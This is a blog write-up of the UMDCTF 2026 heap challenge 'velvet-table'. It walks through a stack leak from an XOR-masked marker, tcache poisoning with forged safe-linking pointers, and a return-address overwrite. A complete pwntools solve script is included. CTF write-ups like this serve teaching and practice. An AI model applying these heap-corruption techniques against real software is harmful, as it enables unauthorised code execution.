/root/blog/velvet-table
yes twin, we (yes WE) love xor

UMDCTF 2026 blessed us with five whole pwn challenges. Sadly, I was busy with... something else at the time, but the challenges were still avaliable even after the CTF had ended. Since I had nothing better to do, I decided to take a look at some of these challenges.

Pwn
velvet-table
NyxIsBad

the house tightened the rules

nc challs.umdctf.io 30304

Downloads

62pts vol.
184 solves

Since I'd still consider myself mediocre at best regarding heap pwn, velvet-table caught my eye with some arbitrary malloc chunk allocations in the code.

TL;DR

Alongside the pwn part of the challenge, there was also a bit of reversing. Many of the values were XOR-encrypted with static(ish) keys, so the reversing wasn't hard, just tedious. The binary had many heap vulnerabilities. A heap overflow in update and a use-after-free on every single cashout call, which might have been intended to be much more limited? I used the heap overflow, since I failed to notice the UAF.

With it, I poisoned the tcache, allocating a chunk on the stack and overwriting the function's return address, as I was too lazy to rewrite the payout hash.

Introduction

As always, the first thing we do:

velvet-table $ pwn checksec velvet-table
[*] '/home/your/name/umdctf26/pwn/velvet-table/velvet-table'
    Arch:       amd64-64-little
    RELRO:      Full RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        PIE enabled
    FORTIFY:    Enabled
    SHSTK:      Enabled
    IBT:        Enabled

We don't get any info about the glibc version actually used on the server. This could be a problem, as the heap implementation has changed throughout libc versions. I assumed that it was a version which had a tcache and safe-linking, and I was thankfully correct.

The program's main loop looks like this:

1) reserve
2) cashout
3) update
4) inspect
5) dealer-note
6) payout
7) settle-ledger
8) leave
>

The actual logic of the program is quite simple, just hidden behind XORs and sometimes decompiled in an ugly manner, because the binary was compiled with optimizations turned on. Our eight choices are quite simple:

  1. reserve: asks for a seat (basically an index) and a size, then allocates a chunk of that size on the heap and puts its address in a global array. Conveniently prints the address of the allocated chunk, and increments the payoutability variable by 2.
  2. cashout: asks for a seat and frees the corresponding chunk. Does not actually remove the chunk pointer from the seat array. Increments the payoutability variable by 1.
  3. update: asks for a seat and a size, then writes arbitrary data of the provided size into its chunk. If the ledger is not settled (see 7), every second byte is written, making this function useless without a prior settling of the ledger. Size is capped to 0x400, but not against the size of the chunk.
  4. inspect: asks for a seat and prints 0x40 bytes from the corresponding chunk, but obfuscated with a XOR stream.
  5. dealer-note: stores 32 user-provided bytes XORed with a static value in an array on the stack. Not used in my solution.
  6. payout: calls a function on the stack if the payoutability is odd and checks that the function pointer hasn't been tampered with by checking a "hash" right after it, which has the function pointer XORed in. By default, this function prints a static string and returns back to main.
  7. settle-ledger: sets a boolean on if the payoutability is at least 7. Three reservations and a cashout are enough to settle the ledger.
  8. leave: exits the main loop by returning 0.

While most of the XORs are done with static values, some also reference keys which are derived from a stack address. This means we need a stack leak.

Leak at first print
the stack was hiding in plain sight

When the program starts, it gives us a "table marker", which is a 32 bit integer. The marker is printed like so:

...

encbase = (ulong)dealer_note_arr >> 4;
...
i_encbase = (uint)encbase;
...
__printf_chk(1,"table marker: 0x%08x\n",i_encbase ^ 0x9ac90307);

...

Since dealer_note_arr is actually an array, this sets encbase to dealer_note_arr's address, which is rsp+0x90, shifted to the right by 4 bits. Since the stack is always aligned to 0x10, this means that the last nibble of the array's address will be 0. All that's missing is the top 7 nibbles, but the stack is always mapped such that the top nibbles are always 0x7ff. We can thus assemble rsp with these static nibbles, sandwitching the unXORed table marker in between.

Exploiting the heap
tcache my beloved

Now that we have everything we need to decipher the tedious XORs, let's get to the pwn part of the pwn challenge.

Since update can write way past the bounds of a chunk, overwriting the metadata of further chunks. I chose to poison the tcache, abusing it to read the default payout function pointer on the stack, leaking PIE.

To prepare for all the later allocations, I allocate 6 chunks into seats 1 through 6. I chose a size of 130, as the lower bound for the size of the chunk was 128, and 130 just felt right.

I then deallocate chunks 2 and 3, leaving us with this tcache:

tcachebin
[sz: 0x90]
[count: 2]
seat 3 seat 2

Since the chunks are sequential on the heap, we can update chunk 1 with data much longer than just that chunk. By crafting data which perfectly matches the overall chunk structure on the heap, we can edit the data of chunk 3. By forging its forward pointer, we can poison the tcache, making the second allocation of this size allocate a chunk at any arbitrary position in memory.

Since the glibc used has safe linking, the forward pointer is actually (chunk_addr >> 12) ^ real_fd. Since reserve gives us the address of our heap chunks, we don't even need a heap leak, so forging forward pointers is trivial.

Since we got the stack's address from the table marker, we can make the forward pointer of the first tcache chunk point to rsp+0xb0, which is the address of the payout function pointer.

After the overwrite, the tcache looks like so:

tcachebin
[sz: 0x90]
[count: 2]
seat 3rsp+0xb0 seat 2

The chunk which belonged to seat 2 is left floating in the heap. Since it isn't linked to any list, it stays there, in a limbo of not being allocated, and at the same time, not being allocatable. That's why the next tcache manipulations use fresh chunks: so I don't have to tiptoe around a ghost.

We then reserve two chunks into seats 7 and 8. The first one is normal, but the second is now on the stack. This means that we can read its contents out with inspect. Since we read out the payout function's address, we now have a pie leak. The output of inspect is encrypted, but decrypting it is trivial, since we have all the static and stack-based keys through a bit of reversing.

def inspect_bytes(chars, seat):
    global uVar8 # = ((rsp+0x90>>4)^0x5a17c3d9) & 0xffffffff
    global b_off # = ((rsp+0x90>>4)^0x7e) & 0xf
    i = 0
    j = 0
    dat = []
    for c in chars:
        t1 = ((b_off ^ seat)+3) & 0xf
        u1 = (t1 * 0x45d9f3b ^ uVar8 ^ i) & 0xffffffff
        b3 = (t1 + j) & 7
        ch = ((rol(u1, b3, 32)) ^ c) & 0xff
        dat.append(ch)
        i += 0x9e37
        j += 1
    return bytes(dat)

Winning
never enough ret2win

Now, the normal choice would be to simply update the function pointer and the hash with win. At this point, I had had enough of all these XORs and tracking down their values throughout the codebase, and since this was all solved after the end of the CTF, I decided to make a small detour.

I noticed that leave actually returns from main with code 0, instead of directly invoking exit(0). Since the offset of the return address is known, I decided to do a traditional ret2win.

Using a similar setup as before, we free chunks 5 and 6 (which we allocated beforehand) and overflow chunk 4, giving us a tcache which looks very similar to before. The return address of main is at a static offset up from rsp, that being rsp+0x618. Since all allocated chunks must be 0x10-aligned, we allocate at rsp+0x610 and compensate later.

tcachebin
[sz: 0x90]
[count: 2]
seat 6rsp+0x610 seat 5

Now, we allocate seats 10 and 11. Seat 10 takes the first mundane chunk and seat 11 is now near our return address. We then update seat 11, whose chunk is 8 bytes before the return address. Since the stack will be unaligned after the return, we use win+8, which skips the stack realignment in the form of sub rsp, 8, which would actually misalign our stack. The data is the address of win+8, padded with 8 As.

All we have to do now is leave, which returns to win!

Here's my beautiful solve script, which leaves you the satisfaction of leaving:

#! /usr/bin/env python3
from pwn import *
from docker_dbg import *

context.terminal = which("kitty")

exe = context.binary = ELF(args.EXE or 'velvet-table_patched')

host = args.HOST or 'challs.umdctf.io'
port = int(args.PORT or 30304)

cont_name = "cont_name"
cont_app = "app"


gdbscript = f'''
set $pie = *'__cxa_finalize@plt'-0x10f0
b *$pie+0x11c0
b *$pie+0x13ce
continue
'''

argv = []

if args.DEBUG:
    context.log_level = "DEBUG"
if args.GDB:
    if args.DOCKER:
        p = remote("localhost", 1337); docker_attach(proc=cont_app, container=cont_name, gdbscript=gdbscript)
    else:
        p = gdb.debug([exe.path] + argv, gdbscript=gdbscript)
elif args.LOCAL:
    p = process([exe.path] + argv)
elif args.REMOTE:
    p = remote(host, port)
else:
#   p = gdb.debug([exe.path] + argv, gdbscript=gdbscript)
    p = process([exe.path] + argv)
#   p = remote("localhost", 1337); docker_attach(proc=cont_app, container=cont_name, gdbscript=gdbscript)
#   p = remote(host, port)

def inspect_bytes(chars):
    global uVar8
    i = 0
    j = 0
    dat = []
    for c in chars:
        t1 = ((b_off ^ seat)+3) & 0xf
        u1 = inted(t1 * 0x45d9f3b ^ uVar8 ^ i)
        b3 = (t1 + j) & 7
        ch = byted(rol(u1, b3, 32)) ^ c
        print("stuff: ", *[hex(n) for n in [t1, u1, b3, ch, i, j]])
        dat.append(ch)
        i += 0x9e37
        j += 1
    return bytes(dat)

def byted(i):
    return i & 0xff
def shorted(i):
    return i & 0xffff
def inted(i):
    return i & 0xffffffff
def longed(i):
    return i & 0xffffffffffffffff

p.recvuntil(b"table marker: ")
tablemarker = int(p.recvline(), 16)

rsp = 0x00007ff000000000+(((tablemarker ^ 0x9ac90307))<<4) - 0x90
b_off = ((rsp+0x90>>4)^0x7e)&0xf
uVar8 = inted((rsp+0x90>>4)^0x5a17c3d9)
print(*[hex(n) for n in [rsp, b_off, uVar8]])

heaps = [0,0,0,0,0,0,0,0,0,0,0]

for i in range(1, 7):
    p.sendline(f"1\n{i}\n130".encode())
    p.recvuntil(b"confirmed: ")
    heaps[i] = int(p.recvline(), 16)
p.sendline(b"2\n2")
p.sendline(b"2\n3")
p.sendline(b"7")
p.sendline(b"3\n1\n296")
size=0x90
thing = b"A"*(size-8)+(p64(0x0000000000000091)+p64((heaps[2]>>12)^0)).ljust(size, b"\0")+(p64(0x91)+p64((heaps[3]>>12)^(rsp+0xb0)))
p.sendline(thing)
p.sendline(b"1\n8\n130")
p.sendline(b"1\n9\n130")
p.sendline(b"not_a_choice")
p.recvuntil(b" choice.")
p.recvuntil(b" choice.")
p.sendline(b"4")
p.recvuntil(b"seat: ")
p.sendline(b"9")
"""
printed addr = (uint)(rsp+0x90)^0x9ac90307
b_off = ((rsp+0x90>>4)^0x7e)&0xf
trueResOffset = (b_off^seat)+3 & 0xf
u8 = (uint)(rsp+0x90>>4)^0x5a17c3d9

inspecting:
    - t1 = ((b_off ^ seat)+3) & 0xf
    - u1 = t1 * 0x45d9f3b ^ u8 ^ i
    - b3 = (t1 + j) & 7
    - c = rol(u1, b3) ^ chunk[j]
    - i += 0x9e37
    - j += 1
"""
seat = 9
chars = p.recvn(0x40)
dat = inspect_bytes(chars)
thing2 = b"A"*(size-8)+(p64(0x0000000000000091)+p64((heaps[5]>>12)^0)).ljust(size, b"\0")+(p64(0x91)+p64((heaps[6]>>12)^(rsp+0x610)))
p.sendline(b"2\n5")
p.sendline(b"2\n6")
p.sendline(b"3\n4\n296")
p.sendline(thing2)
p.sendline(b"1\n10\n130")
p.sendline(b"1\n11\n130")
p.sendline(b"3\n11\n16")
p.sendline(b"A"*8+p64(u64(dat[0:8])+0x18))
p.interactive()

Conclusion

Turns out that the dealer-notes weren't useless. Frederik's wonderful writeup shows that tcache poisoning wasn't the intended solution. That's also visible from the flag, but still, kudos to him for revisiting the challenge and finding the intended solve.

Thanks for reading!